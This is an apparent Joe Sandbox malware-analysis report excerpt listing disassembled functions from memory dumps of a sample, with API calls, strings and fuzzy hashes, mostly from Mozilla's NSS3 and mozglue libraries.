                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                                        • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                                        • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                                                        • Opcode ID: 309982f2c9c085c30a4ab3c83aaddc1119d43ced4f75263160428a5615f26b62
                                                                                                                                                                                                                                                                                        • Instruction ID: 7a7163a095799f65987f9802c33db2d1b49306e18529cf77af13011616ba8763
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 309982f2c9c085c30a4ab3c83aaddc1119d43ced4f75263160428a5615f26b62
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A313773A09931A7D715462898017E57B69BBC2318F1B2535D82C4BE54DB23FC61CFE2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C78EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78EC84
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78EC8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78ECA1
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78ECAE
                                                                                                                                                                                                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C78ECC5
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78ED0A
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C78ED19
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C78ED28
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C78ED2F
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78ED59
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_ensure_started, xrefs: 6C78EC94
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                        • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                                        • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                                        • Opcode ID: 24e2b840a1b6ea100b95be212067b46ec6d0e9ace00c21cecfa478c12c12768d
                                                                                                                                                                                                                                                                                        • Instruction ID: b9f87af33454d368355bafc8a597e9ca5b9eff9dd68833b54c2ecd8e5028995e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24e2b840a1b6ea100b95be212067b46ec6d0e9ace00c21cecfa478c12c12768d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C221F77960110AAFDF009F64D90DA9A377DEB4636DF104231FE2897741DB35AA09CBB2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C882C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(6C883F23,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882C62
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882C76
                                                                                                                                                                                                                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882C86
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882C93
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882CC6
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23,?), ref: 6C882CDA
                                                                                                                                                                                                                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?,?,6C883F23), ref: 6C882CEA
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?), ref: 6C882CF7
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C87E477,?,?,?,00000001,00000000,?), ref: 6C882D4D
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C882D61
                                                                                                                                                                                                                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C882D71
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C882D7E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C7E204A), ref: 6C8507E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,6C7E204A), ref: 6C850864
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C850880
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,6C7E204A), ref: 6C8508CB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(?,?,6C7E204A), ref: 6C8508D7
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(?,?,6C7E204A), ref: 6C8508FB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2446853827-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 588209e47e624b1e5a63e5e8c761ebe111fba3d7477a6062961a1adc7cea3b10
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e6a377ef2e8cf729d481692230d8d545dd48f76e9e412d1de251236c6cc762e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 588209e47e624b1e5a63e5e8c761ebe111fba3d7477a6062961a1adc7cea3b10
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51E3B6D01105ABDB209F28DD458AABB78BF1525CB148934EC1897B12F731E968C7E1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7E4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4C97
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CB0
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CC9
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D11
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D2A
                                                                                                                                                                                                                                                                                        • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D4A
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D57
                                                                                                                                                                                                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D97
                                                                                                                                                                                                                                                                                        • PR_Lock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4DBA
                                                                                                                                                                                                                                                                                        • PR_WaitCondVar.NSS3 ref: 6C7E4DD4
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4DE6
                                                                                                                                                                                                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4DEF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3388019835-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5a49046040d51dc359521aeea3889fe3896f21a2624ef821fb5242059a1c70a2
                                                                                                                                                                                                                                                                                        • Instruction ID: 406595b9269dfe7d769dcdd874d4555d82811ec441d87c72ae2eda06ff6dbcfe
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a49046040d51dc359521aeea3889fe3896f21a2624ef821fb5242059a1c70a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F4182B2A08715CFDB00EFB8D6885697BF4BF0A318F154669DC889B710E730E994CB95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C76C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C76C5A3
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 6C76C9EA
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C76C9FB
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C76CA12
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C76CA2E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C76CAA5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                                                                                                                                        • String ID: (null)$0
                                                                                                                                                                                                                                                                                        • API String ID: 4074790623-38302674
                                                                                                                                                                                                                                                                                        • Opcode ID: 064e7b9da10e0213b85ca00390785c4762ce68b32e004b7a38ac85414ce8390f
                                                                                                                                                                                                                                                                                        • Instruction ID: 1b0daa5b01b1b4cdfdedddd8b0e06a1892f292a73826c79ea250fe1fcb5ab7fc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 064e7b9da10e0213b85ca00390785c4762ce68b32e004b7a38ac85414ce8390f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50A1BF306083429FDB00DF2ACA5475ABBE1BF89749F18882DED99D7B41D731E805CB96
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C743480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C743492
                                                                                                                                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C7434A9
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C7434EF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C74350E
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C743522
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C743552
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C74357C
                                                                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C743592
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                                                        • Opcode ID: 0b76c3c63b56258a473492db5baec828f702fc93a24e691c632da64baf405d16
                                                                                                                                                                                                                                                                                        • Instruction ID: 34b9c4729275dc8e61743340ab067b36fd5ea9f73cd3bdccd43ea57558c0d85d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b76c3c63b56258a473492db5baec828f702fc93a24e691c632da64baf405d16
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB318F71B0020B9FDF14DFB9CA48AAAB7B9FB45705F104539E505E3660DB70AB04CB61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8AECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C8ADE64), ref: 6C8AED0C
                                                                                                                                                                                                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8AED22
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8BB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9918D0,?), ref: 6C8BB095
                                                                                                                                                                                                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C8AED4A
                                                                                                                                                                                                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C8AED6B
                                                                                                                                                                                                                                                                                        • PR_CallOnce.NSS3(6C9C2AA4,6C8C12D0), ref: 6C8AED38
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7E4C70: TlsGetValue.KERNEL32(?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4C97
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7E4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CB0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7E4C70: PR_Unlock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CC9
                                                                                                                                                                                                                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C8AED52
                                                                                                                                                                                                                                                                                        • PR_CallOnce.NSS3(6C9C2AA4,6C8C12D0), ref: 6C8AED83
                                                                                                                                                                                                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C8AED95
                                                                                                                                                                                                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C8AED9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C8C127C,00000000,00000000,00000000), ref: 6C8C650E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                                        • String ID: security
                                                                                                                                                                                                                                                                                        • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                                                        • Opcode ID: 0d13b398736fbcc24b661450c564defda7b753074692598a8e6595dc556cc91b
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e5ba13143fb778fe4a87df9948ef1a20105c61441a11cdef9148e479dcadf4a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d13b398736fbcc24b661450c564defda7b753074692598a8e6595dc556cc91b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B113D76A006046BD73057ADAE84BBB7278AF4160EF040D34E85563E81FB24E61DD7D7
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C892CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(C_InitToken), ref: 6C892CEC
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C892D07
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_Now.NSS3 ref: 6C970A22
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C970A35
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C970A66
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_GetCurrentThread.NSS3 ref: 6C970A70
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C970A9D
